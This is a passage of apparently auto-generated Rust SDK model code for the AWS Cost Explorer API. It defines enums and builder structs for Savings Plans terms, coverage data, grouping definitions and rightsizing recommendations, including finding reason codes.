"MEDIUM_UTILIZATION",
"NO_UPFRONT",
"PARTIAL_UPFRONT",
]
}
}
impl AsRef<str> for PaymentOption {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum TermInYears {
OneYear,
ThreeYears,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for TermInYears {
fn from(s: &str) -> Self {
match s {
"ONE_YEAR" => TermInYears::OneYear,
"THREE_YEARS" => TermInYears::ThreeYears,
other => TermInYears::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for TermInYears {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(TermInYears::from(s))
}
}
impl TermInYears {
pub fn as_str(&self) -> &str {
match self {
TermInYears::OneYear => "ONE_YEAR",
TermInYears::ThreeYears => "THREE_YEARS",
TermInYears::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["ONE_YEAR", "THREE_YEARS"]
}
}
impl AsRef<str> for TermInYears {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum SupportedSavingsPlansType {
ComputeSp,
Ec2InstanceSp,
SagemakerSp,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for SupportedSavingsPlansType {
fn from(s: &str) -> Self {
match s {
"COMPUTE_SP" => SupportedSavingsPlansType::ComputeSp,
"EC2_INSTANCE_SP" => SupportedSavingsPlansType::Ec2InstanceSp,
"SAGEMAKER_SP" => SupportedSavingsPlansType::SagemakerSp,
other => SupportedSavingsPlansType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for SupportedSavingsPlansType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(SupportedSavingsPlansType::from(s))
}
}
impl SupportedSavingsPlansType {
pub fn as_str(&self) -> &str {
match self {
SupportedSavingsPlansType::ComputeSp => "COMPUTE_SP",
SupportedSavingsPlansType::Ec2InstanceSp => "EC2_INSTANCE_SP",
SupportedSavingsPlansType::SagemakerSp => "SAGEMAKER_SP",
SupportedSavingsPlansType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["COMPUTE_SP", "EC2_INSTANCE_SP", "SAGEMAKER_SP"]
}
}
impl AsRef<str> for SupportedSavingsPlansType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum AccountScope {
Linked,
Payer,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for AccountScope {
fn from(s: &str) -> Self {
match s {
"LINKED" => AccountScope::Linked,
"PAYER" => AccountScope::Payer,
other => AccountScope::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for AccountScope {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(AccountScope::from(s))
}
}
impl AccountScope {
pub fn as_str(&self) -> &str {
match self {
AccountScope::Linked => "LINKED",
AccountScope::Payer => "PAYER",
AccountScope::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["LINKED", "PAYER"]
}
}
impl AsRef<str> for AccountScope {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Metadata about your Savings Plans Purchase Recommendations.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansPurchaseRecommendationMetadata {
/// <p>The unique identifier for the recommendation set.</p>
pub recommendation_id: std::option::Option<std::string::String>,
/// <p>The timestamp showing when the recommendations were generated.</p>
pub generation_timestamp: std::option::Option<std::string::String>,
/// <p>Additional metadata that might be applicable to the recommendation.</p>
pub additional_metadata: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansPurchaseRecommendationMetadata {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansPurchaseRecommendationMetadata");
formatter.field("recommendation_id", &self.recommendation_id);
formatter.field("generation_timestamp", &self.generation_timestamp);
formatter.field("additional_metadata", &self.additional_metadata);
formatter.finish()
}
}
/// See [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
pub mod savings_plans_purchase_recommendation_metadata {
/// A builder for [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) recommendation_id: std::option::Option<std::string::String>,
pub(crate) generation_timestamp: std::option::Option<std::string::String>,
pub(crate) additional_metadata: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The unique identifier for the recommendation set.</p>
pub fn recommendation_id(mut self, input: impl Into<std::string::String>) -> Self {
self.recommendation_id = Some(input.into());
self
}
pub fn set_recommendation_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.recommendation_id = input;
self
}
/// <p>The timestamp showing when the recommendations were generated.</p>
pub fn generation_timestamp(mut self, input: impl Into<std::string::String>) -> Self {
self.generation_timestamp = Some(input.into());
self
}
pub fn set_generation_timestamp(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.generation_timestamp = input;
self
}
/// <p>Additional metadata that might be applicable to the recommendation.</p>
pub fn additional_metadata(mut self, input: impl Into<std::string::String>) -> Self {
self.additional_metadata = Some(input.into());
self
}
pub fn set_additional_metadata(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.additional_metadata = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
pub fn build(self) -> crate::model::SavingsPlansPurchaseRecommendationMetadata {
crate::model::SavingsPlansPurchaseRecommendationMetadata {
recommendation_id: self.recommendation_id,
generation_timestamp: self.generation_timestamp,
additional_metadata: self.additional_metadata,
}
}
}
}
impl SavingsPlansPurchaseRecommendationMetadata {
/// Creates a new builder-style object to manufacture [`SavingsPlansPurchaseRecommendationMetadata`](crate::model::SavingsPlansPurchaseRecommendationMetadata)
pub fn builder() -> crate::model::savings_plans_purchase_recommendation_metadata::Builder {
crate::model::savings_plans_purchase_recommendation_metadata::Builder::default()
}
}
/// <p>The amount of Savings Plans eligible usage that is covered by Savings Plans. All
/// calculations consider the On-Demand equivalent of your Savings Plans usage.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansCoverage {
/// <p>The attribute that applies to a specific <code>Dimension</code>.</p>
pub attributes:
std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
/// <p>The amount of Savings Plans eligible usage that the Savings Plans covered.</p>
pub coverage: std::option::Option<crate::model::SavingsPlansCoverageData>,
/// <p>The time period of the request. </p>
pub time_period: std::option::Option<crate::model::DateInterval>,
}
impl std::fmt::Debug for SavingsPlansCoverage {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansCoverage");
formatter.field("attributes", &self.attributes);
formatter.field("coverage", &self.coverage);
formatter.field("time_period", &self.time_period);
formatter.finish()
}
}
/// See [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
pub mod savings_plans_coverage {
/// A builder for [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) attributes: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
pub(crate) coverage: std::option::Option<crate::model::SavingsPlansCoverageData>,
pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
}
impl Builder {
pub fn attributes(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
let mut hash_map = self.attributes.unwrap_or_default();
hash_map.insert(k.into(), v.into());
self.attributes = Some(hash_map);
self
}
pub fn set_attributes(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.attributes = input;
self
}
/// <p>The amount of Savings Plans eligible usage that the Savings Plans covered.</p>
pub fn coverage(mut self, input: crate::model::SavingsPlansCoverageData) -> Self {
self.coverage = Some(input);
self
}
pub fn set_coverage(
mut self,
input: std::option::Option<crate::model::SavingsPlansCoverageData>,
) -> Self {
self.coverage = input;
self
}
/// <p>The time period of the request. </p>
pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
self.time_period = Some(input);
self
}
pub fn set_time_period(
mut self,
input: std::option::Option<crate::model::DateInterval>,
) -> Self {
self.time_period = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
pub fn build(self) -> crate::model::SavingsPlansCoverage {
crate::model::SavingsPlansCoverage {
attributes: self.attributes,
coverage: self.coverage,
time_period: self.time_period,
}
}
}
}
impl SavingsPlansCoverage {
/// Creates a new builder-style object to manufacture [`SavingsPlansCoverage`](crate::model::SavingsPlansCoverage)
pub fn builder() -> crate::model::savings_plans_coverage::Builder {
crate::model::savings_plans_coverage::Builder::default()
}
}
/// <p>Specific coverage percentage, On-Demand costs, and spend covered by Savings Plans, and
/// total Savings Plans costs for an account.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SavingsPlansCoverageData {
/// <p>The amount of your Amazon Web Services usage that is covered by a Savings Plans.</p>
pub spend_covered_by_savings_plans: std::option::Option<std::string::String>,
/// <p>The cost of your Amazon Web Services usage at the public On-Demand rate.</p>
pub on_demand_cost: std::option::Option<std::string::String>,
/// <p>The total cost of your Amazon Web Services usage, regardless of your purchase
/// option.</p>
pub total_cost: std::option::Option<std::string::String>,
/// <p>The percentage of your existing Savings Plans covered usage, divided by all of your
/// eligible Savings Plans usage in an account (or set of accounts).</p>
pub coverage_percentage: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for SavingsPlansCoverageData {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("SavingsPlansCoverageData");
formatter.field(
"spend_covered_by_savings_plans",
&self.spend_covered_by_savings_plans,
);
formatter.field("on_demand_cost", &self.on_demand_cost);
formatter.field("total_cost", &self.total_cost);
formatter.field("coverage_percentage", &self.coverage_percentage);
formatter.finish()
}
}
/// See [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
pub mod savings_plans_coverage_data {
/// A builder for [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) spend_covered_by_savings_plans: std::option::Option<std::string::String>,
pub(crate) on_demand_cost: std::option::Option<std::string::String>,
pub(crate) total_cost: std::option::Option<std::string::String>,
pub(crate) coverage_percentage: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The amount of your Amazon Web Services usage that is covered by a Savings Plans.</p>
pub fn spend_covered_by_savings_plans(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.spend_covered_by_savings_plans = Some(input.into());
self
}
pub fn set_spend_covered_by_savings_plans(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.spend_covered_by_savings_plans = input;
self
}
/// <p>The cost of your Amazon Web Services usage at the public On-Demand rate.</p>
pub fn on_demand_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.on_demand_cost = Some(input.into());
self
}
pub fn set_on_demand_cost(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.on_demand_cost = input;
self
}
/// <p>The total cost of your Amazon Web Services usage, regardless of your purchase
/// option.</p>
pub fn total_cost(mut self, input: impl Into<std::string::String>) -> Self {
self.total_cost = Some(input.into());
self
}
pub fn set_total_cost(mut self, input: std::option::Option<std::string::String>) -> Self {
self.total_cost = input;
self
}
/// <p>The percentage of your existing Savings Plans covered usage, divided by all of your
/// eligible Savings Plans usage in an account (or set of accounts).</p>
pub fn coverage_percentage(mut self, input: impl Into<std::string::String>) -> Self {
self.coverage_percentage = Some(input.into());
self
}
pub fn set_coverage_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.coverage_percentage = input;
self
}
/// Consumes the builder and constructs a [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
pub fn build(self) -> crate::model::SavingsPlansCoverageData {
crate::model::SavingsPlansCoverageData {
spend_covered_by_savings_plans: self.spend_covered_by_savings_plans,
on_demand_cost: self.on_demand_cost,
total_cost: self.total_cost,
coverage_percentage: self.coverage_percentage,
}
}
}
}
impl SavingsPlansCoverageData {
/// Creates a new builder-style object to manufacture [`SavingsPlansCoverageData`](crate::model::SavingsPlansCoverageData)
pub fn builder() -> crate::model::savings_plans_coverage_data::Builder {
crate::model::savings_plans_coverage_data::Builder::default()
}
}
/// <p>Represents a group when you specify a group by criteria or in the response to a query
/// with a specific grouping.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GroupDefinition {
/// <p>The string that represents the type of group.</p>
pub r#type: std::option::Option<crate::model::GroupDefinitionType>,
/// <p>The string that represents a key for a specified group.</p>
pub key: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GroupDefinition {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GroupDefinition");
formatter.field("r#type", &self.r#type);
formatter.field("key", &self.key);
formatter.finish()
}
}
/// See [`GroupDefinition`](crate::model::GroupDefinition)
pub mod group_definition {
/// A builder for [`GroupDefinition`](crate::model::GroupDefinition)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) r#type: std::option::Option<crate::model::GroupDefinitionType>,
pub(crate) key: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The string that represents the type of group.</p>
pub fn r#type(mut self, input: crate::model::GroupDefinitionType) -> Self {
self.r#type = Some(input);
self
}
pub fn set_type(
mut self,
input: std::option::Option<crate::model::GroupDefinitionType>,
) -> Self {
self.r#type = input;
self
}
/// <p>The string that represents a key for a specified group.</p>
pub fn key(mut self, input: impl Into<std::string::String>) -> Self {
self.key = Some(input.into());
self
}
pub fn set_key(mut self, input: std::option::Option<std::string::String>) -> Self {
self.key = input;
self
}
/// Consumes the builder and constructs a [`GroupDefinition`](crate::model::GroupDefinition)
pub fn build(self) -> crate::model::GroupDefinition {
crate::model::GroupDefinition {
r#type: self.r#type,
key: self.key,
}
}
}
}
impl GroupDefinition {
/// Creates a new builder-style object to manufacture [`GroupDefinition`](crate::model::GroupDefinition)
pub fn builder() -> crate::model::group_definition::Builder {
crate::model::group_definition::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum GroupDefinitionType {
CostCategory,
Dimension,
Tag,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for GroupDefinitionType {
fn from(s: &str) -> Self {
match s {
"COST_CATEGORY" => GroupDefinitionType::CostCategory,
"DIMENSION" => GroupDefinitionType::Dimension,
"TAG" => GroupDefinitionType::Tag,
other => GroupDefinitionType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for GroupDefinitionType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(GroupDefinitionType::from(s))
}
}
impl GroupDefinitionType {
pub fn as_str(&self) -> &str {
match self {
GroupDefinitionType::CostCategory => "COST_CATEGORY",
GroupDefinitionType::Dimension => "DIMENSION",
GroupDefinitionType::Tag => "TAG",
GroupDefinitionType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["COST_CATEGORY", "DIMENSION", "TAG"]
}
}
impl AsRef<str> for GroupDefinitionType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>You can use <code>RightsizingRecommendationConfiguration</code> to customize
/// recommendations across two attributes. You can choose to view recommendations for
/// instances within the same instance families or across different instance families. You
/// can also choose to view your estimated savings that are associated with recommendations
/// with consideration of existing Savings Plans or RI benefits, or neither. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendationConfiguration {
/// <p>The option to see recommendations within the same instance family or recommendations
/// for instances across other families. The default value is
/// <code>SAME_INSTANCE_FAMILY</code>. </p>
pub recommendation_target: std::option::Option<crate::model::RecommendationTarget>,
/// <p>The option to consider RI or Savings Plans discount benefits in your savings
/// calculation. The default value is <code>TRUE</code>. </p>
pub benefits_considered: bool,
}
impl std::fmt::Debug for RightsizingRecommendationConfiguration {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("RightsizingRecommendationConfiguration");
formatter.field("recommendation_target", &self.recommendation_target);
formatter.field("benefits_considered", &self.benefits_considered);
formatter.finish()
}
}
/// See [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
pub mod rightsizing_recommendation_configuration {
/// A builder for [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) recommendation_target: std::option::Option<crate::model::RecommendationTarget>,
pub(crate) benefits_considered: std::option::Option<bool>,
}
impl Builder {
/// <p>The option to see recommendations within the same instance family or recommendations
/// for instances across other families. The default value is
/// <code>SAME_INSTANCE_FAMILY</code>. </p>
pub fn recommendation_target(mut self, input: crate::model::RecommendationTarget) -> Self {
self.recommendation_target = Some(input);
self
}
pub fn set_recommendation_target(
mut self,
input: std::option::Option<crate::model::RecommendationTarget>,
) -> Self {
self.recommendation_target = input;
self
}
/// <p>The option to consider RI or Savings Plans discount benefits in your savings
/// calculation. The default value is <code>TRUE</code>. </p>
pub fn benefits_considered(mut self, input: bool) -> Self {
self.benefits_considered = Some(input);
self
}
pub fn set_benefits_considered(mut self, input: std::option::Option<bool>) -> Self {
self.benefits_considered = input;
self
}
/// Consumes the builder and constructs a [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
pub fn build(self) -> crate::model::RightsizingRecommendationConfiguration {
crate::model::RightsizingRecommendationConfiguration {
recommendation_target: self.recommendation_target,
benefits_considered: self.benefits_considered.unwrap_or_default(),
}
}
}
}
impl RightsizingRecommendationConfiguration {
/// Creates a new builder-style object to manufacture [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
pub fn builder() -> crate::model::rightsizing_recommendation_configuration::Builder {
crate::model::rightsizing_recommendation_configuration::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum RecommendationTarget {
CrossInstanceFamily,
SameInstanceFamily,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for RecommendationTarget {
fn from(s: &str) -> Self {
match s {
"CROSS_INSTANCE_FAMILY" => RecommendationTarget::CrossInstanceFamily,
"SAME_INSTANCE_FAMILY" => RecommendationTarget::SameInstanceFamily,
other => RecommendationTarget::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for RecommendationTarget {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(RecommendationTarget::from(s))
}
}
impl RecommendationTarget {
pub fn as_str(&self) -> &str {
match self {
RecommendationTarget::CrossInstanceFamily => "CROSS_INSTANCE_FAMILY",
RecommendationTarget::SameInstanceFamily => "SAME_INSTANCE_FAMILY",
RecommendationTarget::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["CROSS_INSTANCE_FAMILY", "SAME_INSTANCE_FAMILY"]
}
}
impl AsRef<str> for RecommendationTarget {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Recommendations to rightsize resources.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendation {
/// <p>The account that this recommendation is for.</p>
pub account_id: std::option::Option<std::string::String>,
/// <p>Context regarding the current instance.</p>
pub current_instance: std::option::Option<crate::model::CurrentInstance>,
/// <p>A recommendation to either terminate or modify the resource.</p>
pub rightsizing_type: std::option::Option<crate::model::RightsizingType>,
/// <p>The details for the modification recommendations. </p>
pub modify_recommendation_detail: std::option::Option<crate::model::ModifyRecommendationDetail>,
/// <p>The details for termination recommendations.</p>
pub terminate_recommendation_detail:
std::option::Option<crate::model::TerminateRecommendationDetail>,
/// <p> The list of possible reasons why the recommendation is generated such as under or
/// over utilization of specific metrics (for example, CPU, Memory, Network). </p>
pub finding_reason_codes: std::option::Option<std::vec::Vec<crate::model::FindingReasonCode>>,
}
impl std::fmt::Debug for RightsizingRecommendation {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("RightsizingRecommendation");
formatter.field("account_id", &self.account_id);
formatter.field("current_instance", &self.current_instance);
formatter.field("rightsizing_type", &self.rightsizing_type);
formatter.field(
"modify_recommendation_detail",
&self.modify_recommendation_detail,
);
formatter.field(
"terminate_recommendation_detail",
&self.terminate_recommendation_detail,
);
formatter.field("finding_reason_codes", &self.finding_reason_codes);
formatter.finish()
}
}
/// See [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
pub mod rightsizing_recommendation {
/// A builder for [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) account_id: std::option::Option<std::string::String>,
pub(crate) current_instance: std::option::Option<crate::model::CurrentInstance>,
pub(crate) rightsizing_type: std::option::Option<crate::model::RightsizingType>,
pub(crate) modify_recommendation_detail:
std::option::Option<crate::model::ModifyRecommendationDetail>,
pub(crate) terminate_recommendation_detail:
std::option::Option<crate::model::TerminateRecommendationDetail>,
pub(crate) finding_reason_codes:
std::option::Option<std::vec::Vec<crate::model::FindingReasonCode>>,
}
impl Builder {
/// <p>The account that this recommendation is for.</p>
pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
self.account_id = Some(input.into());
self
}
pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.account_id = input;
self
}
/// <p>Context regarding the current instance.</p>
pub fn current_instance(mut self, input: crate::model::CurrentInstance) -> Self {
self.current_instance = Some(input);
self
}
pub fn set_current_instance(
mut self,
input: std::option::Option<crate::model::CurrentInstance>,
) -> Self {
self.current_instance = input;
self
}
/// <p>A recommendation to either terminate or modify the resource.</p>
pub fn rightsizing_type(mut self, input: crate::model::RightsizingType) -> Self {
self.rightsizing_type = Some(input);
self
}
pub fn set_rightsizing_type(
mut self,
input: std::option::Option<crate::model::RightsizingType>,
) -> Self {
self.rightsizing_type = input;
self
}
/// <p>The details for the modification recommendations. </p>
pub fn modify_recommendation_detail(
mut self,
input: crate::model::ModifyRecommendationDetail,
) -> Self {
self.modify_recommendation_detail = Some(input);
self
}
pub fn set_modify_recommendation_detail(
mut self,
input: std::option::Option<crate::model::ModifyRecommendationDetail>,
) -> Self {
self.modify_recommendation_detail = input;
self
}
/// <p>The details for termination recommendations.</p>
pub fn terminate_recommendation_detail(
mut self,
input: crate::model::TerminateRecommendationDetail,
) -> Self {
self.terminate_recommendation_detail = Some(input);
self
}
pub fn set_terminate_recommendation_detail(
mut self,
input: std::option::Option<crate::model::TerminateRecommendationDetail>,
) -> Self {
self.terminate_recommendation_detail = input;
self
}
pub fn finding_reason_codes(
mut self,
input: impl Into<crate::model::FindingReasonCode>,
) -> Self {
let mut v = self.finding_reason_codes.unwrap_or_default();
v.push(input.into());
self.finding_reason_codes = Some(v);
self
}
pub fn set_finding_reason_codes(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::FindingReasonCode>>,
) -> Self {
self.finding_reason_codes = input;
self
}
/// Consumes the builder and constructs a [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
pub fn build(self) -> crate::model::RightsizingRecommendation {
crate::model::RightsizingRecommendation {
account_id: self.account_id,
current_instance: self.current_instance,
rightsizing_type: self.rightsizing_type,
modify_recommendation_detail: self.modify_recommendation_detail,
terminate_recommendation_detail: self.terminate_recommendation_detail,
finding_reason_codes: self.finding_reason_codes,
}
}
}
}
impl RightsizingRecommendation {
/// Creates a new builder-style object to manufacture [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
pub fn builder() -> crate::model::rightsizing_recommendation::Builder {
crate::model::rightsizing_recommendation::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum FindingReasonCode {
CpuOverProvisioned,
CpuUnderProvisioned,
DiskIopsOverProvisioned,
DiskIopsUnderProvisioned,
DiskThroughputOverProvisioned,
DiskThroughputUnderProvisioned,
EbsIopsOverProvisioned,
EbsIopsUnderProvisioned,
EbsThroughputOverProvisioned,
EbsThroughputUnderProvisioned,
MemoryOverProvisioned,
MemoryUnderProvisioned,
NetworkBandwidthOverProvisioned,
NetworkBandwidthUnderProvisioned,
NetworkPpsOverProvisioned,
NetworkPpsUnderProvisioned,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for FindingReasonCode {
fn from(s: &str) -> Self {
match s {
"CPU_OVER_PROVISIONED" => FindingReasonCode::CpuOverProvisioned,
"CPU_UNDER_PROVISIONED" => FindingReasonCode::CpuUnderProvisioned,
"DISK_IOPS_OVER_PROVISIONED" => FindingReasonCode::DiskIopsOverProvisioned,
"DISK_IOPS_UNDER_PROVISIONED" => FindingReasonCode::DiskIopsUnderProvisioned,
"DISK_THROUGHPUT_OVER_PROVISIONED" => FindingReasonCode::DiskThroughputOverProvisioned,
"DISK_THROUGHPUT_UNDER_PROVISIONED" => {
FindingReasonCode::DiskThroughputUnderProvisioned
}
"EBS_IOPS_OVER_PROVISIONED" => FindingReasonCode::EbsIopsOverProvisioned,
"EBS_IOPS_UNDER_PROVISIONED" => FindingReasonCode::EbsIopsUnderProvisioned,
"EBS_THROUGHPUT_OVER_PROVISIONED" => FindingReasonCode::EbsThroughputOverProvisioned,
"EBS_THROUGHPUT_UNDER_PROVISIONED" => FindingReasonCode::EbsThroughputUnderProvisioned,
"MEMORY_OVER_PROVISIONED" => FindingReasonCode::MemoryOverProvisioned,
"MEMORY_UNDER_PROVISIONED" => FindingReasonCode::MemoryUnderProvisioned,
"NETWORK_BANDWIDTH_OVER_PROVISIONED" => {
FindingReasonCode::NetworkBandwidthOverProvisioned
}
"NETWORK_BANDWIDTH_UNDER_PROVISIONED" => {
FindingReasonCode::NetworkBandwidthUnderProvisioned
}
"NETWORK_PPS_OVER_PROVISIONED" => FindingReasonCode::NetworkPpsOverProvisioned,
"NETWORK_PPS_UNDER_PROVISIONED" => FindingReasonCode::NetworkPpsUnderProvisioned,
other => FindingReasonCode::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for FindingReasonCode {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(FindingReasonCode::from(s))
}
}
impl FindingReasonCode {
pub fn as_str(&self) -> &str {
match self {
FindingReasonCode::CpuOverProvisioned => "CPU_OVER_PROVISIONED",
FindingReasonCode::CpuUnderProvisioned => "CPU_UNDER_PROVISIONED",
FindingReasonCode::DiskIopsOverProvisioned => "DISK_IOPS_OVER_PROVISIONED",
FindingReasonCode::DiskIopsUnderProvisioned => "DISK_IOPS_UNDER_PROVISIONED",
FindingReasonCode::DiskThroughputOverProvisioned => "DISK_THROUGHPUT_OVER_PROVISIONED",
FindingReasonCode::DiskThroughputUnderProvisioned => {
"DISK_THROUGHPUT_UNDER_PROVISIONED"
}
FindingReasonCode::EbsIopsOverProvisioned => "EBS_IOPS_OVER_PROVISIONED",
FindingReasonCode::EbsIopsUnderProvisioned => "EBS_IOPS_UNDER_PROVISIONED",
FindingReasonCode::EbsThroughputOverProvisioned => "EBS_THROUGHPUT_OVER_PROVISIONED",
FindingReasonCode::EbsThroughputUnderProvisioned => "EBS_THROUGHPUT_UNDER_PROVISIONED",
FindingReasonCode::MemoryOverProvisioned => "MEMORY_OVER_PROVISIONED",
FindingReasonCode::MemoryUnderProvisioned => "MEMORY_UNDER_PROVISIONED",
FindingReasonCode::NetworkBandwidthOverProvisioned => {
"NETWORK_BANDWIDTH_OVER_PROVISIONED"
}
FindingReasonCode::NetworkBandwidthUnderProvisioned => {
"NETWORK_BANDWIDTH_UNDER_PROVISIONED"
}
FindingReasonCode::NetworkPpsOverProvisioned => "NETWORK_PPS_OVER_PROVISIONED",
